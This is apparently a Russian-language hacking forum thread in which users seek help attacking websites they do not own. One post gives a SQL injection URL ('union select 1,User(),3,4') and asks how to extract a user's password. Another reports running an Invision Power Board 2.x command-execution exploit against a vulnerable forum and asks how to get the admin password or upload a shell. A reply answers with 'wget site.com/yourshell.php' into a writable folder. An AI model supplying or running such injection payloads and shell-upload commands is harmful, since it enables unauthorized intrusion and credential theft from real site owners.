вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите

универсального запроса нет :) если хочешь чтоб за тебя всё сделали то уж как минимум ссылку в студию. А если хочешь сам - то почитай в статьях про скуль инжи, клоновых тем вагон и тележка)

вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите
Если линк не хочешь светить, то пиши мне в ПМ или в асю...

Ну и мене напиши тож чтоль %)

там префикс ищи исходник.

решил новую тему не делать
всем привет опять,нашёл форум уязвимый IPB 2.1.5
заюзал сплойт Invision Power Board 2.* commands execution exploit by RST/GHC
вродебы всё ок,тока вот теперь появилась строка "Command for execute or 'exit' for exit #" чё там писать(напривем чтоб получить пасс админа или залить шелл)?

ищешь папку, где у тебя прав хватает на запись и там:
wget site.com/yourshell.php
про комманды можно в гугле много интересного найти)